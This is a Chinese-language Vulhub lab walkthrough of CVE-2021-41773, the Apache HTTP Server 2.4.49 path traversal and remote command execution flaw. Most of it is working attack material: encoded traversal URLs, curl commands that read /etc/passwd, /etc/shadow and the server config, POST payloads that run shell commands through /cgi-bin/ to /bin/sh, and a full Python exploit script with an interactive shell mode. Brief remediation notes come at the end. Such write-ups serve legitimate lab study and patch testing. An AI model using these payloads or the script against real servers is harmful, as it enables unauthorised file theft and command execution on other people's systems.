CVE-2021-41773 Apache HTTP Server 路径穿越与远程命令执行漏洞

漏洞信息项目内容CVE 编号CVE-2021-41773漏洞类型路径穿越 (Path Traversal) → 任意文件读取 / 远程命令执行 (RCE)影响组件Apache HTTP Server影响版本2.4.49 仅此版本2.4.48 及之前不受此版本特有的路径穿越影响2.4.50 修复靶场版本Apache HTTP Server 2.4.49 (Unix) mod_cgi / mod_cgid 已启用靶机地址http://192.168.229.60:8080/Vulhub 路径/vulhub/vulhub/httpd/CVE-2021-41773/利用条件配置文件必须包含Directory /Require all granted/Directory本靶场已配置漏洞原理背景Apache HTTP Server 2.4.49 版本在路径规范化URL path normalization处理逻辑中存在缺陷。当 URL 路径中包含.%2e即 URL 编码的../组合时Apache 的路径解析函数未能正确规范化导致可以绕过目录限制访问 Web 根目录以外的文件。漏洞成因正常请求 GET /icons/README HTTP/1.1 → Apache 规范化路径/usr/local/apache2/htdocs/icons/README ✅ ​ 路径穿越请求 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 → Apache 未能正确解码并规范化 .%2e (即..) → 实际访问/etc/passwd ❌访问路径分析 ┌──────────────────────────────────────────────────┐ │ /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd │ │ │ │ │ │ │ ▼ ▼ ▼ │ │ ../ ../ ../ │ │ └──────┬──────┘ │ │ │ ▼ │ │ │ /icons/向上穿越一次 │ │ │ │ │ │ │ 连续4次穿越 │ │ │ │ │ │ │ 路径: /icons → / → / → / → / → /etc/passwd │ └──────────────────────────────────────────────────┘RCE 原理当 Apache 同时启用了mod_cgi或mod_cgid时路径穿越可以访问到/cgi-bin/目录之外的 CGI 脚本。通过穿越到/bin/sh并传入 POST 数据可以实现任意命令执行POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh Content-Type: application/x-www-form-urlencoded ​ echo;id/cgi-bin/是 Apache 默认配置的 CGI 脚本目录路径穿越到/bin/sh系统 shellecho;确保输出不会干扰标准输出后续命令以 daemon 用户权限执行攻击步骤Step 1确认靶机版本GET / HTTP/1.1 Host: 192.168.229.60:8080HTTP/1.1 200 OK Server: Apache/2.4.49 (Unix) Content-Type: text/html ​ htmlbodyh1It works!/h1/body/html确认 Apache 版本为2.4.49存在漏洞。Step 2路径穿越读取任意文件利用.%2e绕过路径检查读取服务器上的任意文件# 读取 /etc/passwd curl -v --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwdroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ...关键参数说明--path-as-is— 告诉 curl不要自动规范化URL 中的路径必须使用/icons/— Apache 默认存在的可访问目录.%2e— URL 编码后的.点与后面的%2e组合解码后为..上级目录更多文件读取示例# 读取 Apache 配置文件 curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/usr/local/apache2/conf/httpd.conf ​ # 读取 Web 目录下的脚本源码保护源码不被直接访问 curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/usr/local/apache2/htdocs/index.html ​ # 读取系统敏感文件 curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow curl --path-as-is http://192.168.229.60:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hostsStep 3CGI 模式远程命令执行RCE当服务器启用了mod_cgi或mod_cgid本靶场已开启路径穿越可访问到系统 shellcurl -v --data echo;id http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/shHTTP/1.1 200 OK Server: Apache/2.4.49 (Unix) ​ uid1(daemon) gid1(daemon) groups1(daemon)命令以daemon用户身份执行。通过更换 POST body 可以执行任意命令curl --data echo;ls -la / http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh curl --data echo;cat /etc/passwd http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh curl --data echo;whoami http://192.168.229.60:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/shPython 版完整利用脚本#!/usr/bin/env python3 CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal RCE Exploit Author: Vulhub Lab ​ import requests import sys import urllib.parse ​ class CVE_2021_41773: def __init__(self, target, port80): self.base_url fhttp://{target}:{port} self.session requests.Session() def read_file(self, filepath, directory/icons): 路径穿越读取任意文件 Args: filepath: 目标文件路径如 /etc/passwd directory: 起始目录默认 /icons Returns: 文件内容字符串失败返回 None # 构建穿越路径: 从 /icons 需要穿越到根然后再到目标 traversal /.%2e/%2e%2e/%2e%2e/%2e%2e url f{self.base_url}{directory}{traversal}{filepath} print(f[*] Reading: {filepath}) print(f[*] URL: {url}) try: # --path-as-is 对应 Python 中不自动规范化路径 r self.session.get(url, timeout10) if r.status_code 200 and len(r.text) 0: print(f[] Success! ({len(r.text)} bytes)) return r.text else: print(f[-] Failed: HTTP {r.status_code}) return None except requests.exceptions.RequestException as e: print(f[-] Error: {e}) return None def exec_command(self, command): 通过 CGI 路径穿越执行系统命令 (RCE) Args: command: 要执行的命令如 id, ls -la / Returns: 命令输出字符串失败返回 None url f{self.base_url}/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh payload fecho;{command} print(f[*] Executing: {command}) print(f[*] POST to: {url}) try: r self.session.post(url, datapayload, timeout10) if r.status_code 200 and len(r.text) 0: print(f[] Success! ({len(r.text)} bytes)) return r.text else: print(f[-] Failed: HTTP {r.status_code}) return None except requests.exceptions.RequestException as e: print(f[-] Error: {e}) return None def interactive_shell(self): 交互式命令执行 print([*] CVE-2021-41773 RCE Interactive Shell (type exit to quit)) print([*] Commands run as daemon user) print() while True: try: cmd input($ ).strip() if cmd.lower() in (exit, quit): break if not cmd: continue output self.exec_command(cmd) if output: print(output) except KeyboardInterrupt: print(\n[*] Exiting...) break except Exception as e: print(f[-] Error: {e}) ​ ​ def banner(): print( * 55) print( CVE-2021-41773 - Apache 2.4.49 Path Traversal / RCE) print( * 55) print() ​ def main(): banner() if len(sys.argv) 3: print(Usage:) print( python3 cve-2021-41773.py target port read filepath) print( python3 cve-2021-41773.py target port exec command) print( python3 cve-2021-41773.py target port shell) print() print(Examples:) print( python3 cve-2021-41773.py 192.168.229.60 8080 read /etc/passwd) print( python3 cve-2021-41773.py 192.168.229.60 8080 exec id) print( python3 cve-2021-41773.py 192.168.229.60 8080 shell) sys.exit(1) target sys.argv[1] port int(sys.argv[2]) action sys.argv[3] exploit CVE_2021_41773(target, port) if action read and len(sys.argv) 5: filepath sys.argv[4] content exploit.read_file(filepath) if content: print( * 55) print(content.rstrip()) print( * 55) elif action exec and len(sys.argv) 5: command .join(sys.argv[4:]) output exploit.exec_command(command) if output: print( * 55) print(output.rstrip()) print( * 55) elif action shell: exploit.interactive_shell() else: print([-] Invalid action or missing arguments) ​ ​ if __name__ __main__: main()使用示例# 读取文件 python3 cve-2021-41773.py 192.168.229.60 8080 read /etc/passwd ​ # 执行命令 python3 cve-2021-41773.py 192.168.229.60 8080 exec id ​ # 交互式 Shell python3 cve-2021-41773.py 192.168.229.60 8080 shell关键要点总结✅/⚠️要点✅CVE-2021-41773 仅影响 Apache HTTP Server2.4.49 这一个版本非常罕见的单一版本漏洞✅路径穿越利用.%2eURL 编码的..绕过路径规范化 → 任意文件读取✅远程命令执行当mod_cgi/mod_cgid开启时可通过/cgi-bin/.%2e/../bin/sh执行命令✅--path-as-is是 curl 利用的关键参数否则 curl 会自动规范化路径导致攻击失败✅RCE 以daemon用户权限执行非 root但已足够造成严重破坏⚠️修复方案升级到 Apache2.4.50或更高版本⚠️临时缓解在配置中移除Directory /Require all granted/Directory⚠️如果业务无法升级可在 WAF/Nginx 反向代理层拦截包含%2e或..的请求路径⚠️该漏洞在 2021 年 10 月被公开后 48 小时内即出现大量在野利用属于紧急修补类漏洞